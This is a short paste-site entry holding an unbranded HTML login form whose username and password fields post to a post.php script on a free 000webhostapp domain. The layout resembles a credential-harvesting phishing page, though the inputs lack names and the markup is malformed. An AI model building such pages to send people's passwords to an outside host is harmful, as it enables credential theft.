Untitled
3 years ago by test2919 in Plain Text
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<title></title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="login-box">
<h1>Login</h1>
<div class="textbox">
<i class="fas fa-user"></i>
<form action="https://test2919.000webhostapp.com/post.php" method="post">
<input type="text" placeholder="Username">
</div>
<div class="textbox">
<i class="fas fa-lock"></i>
<input type="password" placeholder="Password">
</div>
<input type="submit" class="btn" value="Sign in">
</form>
</div>
</body>
</html>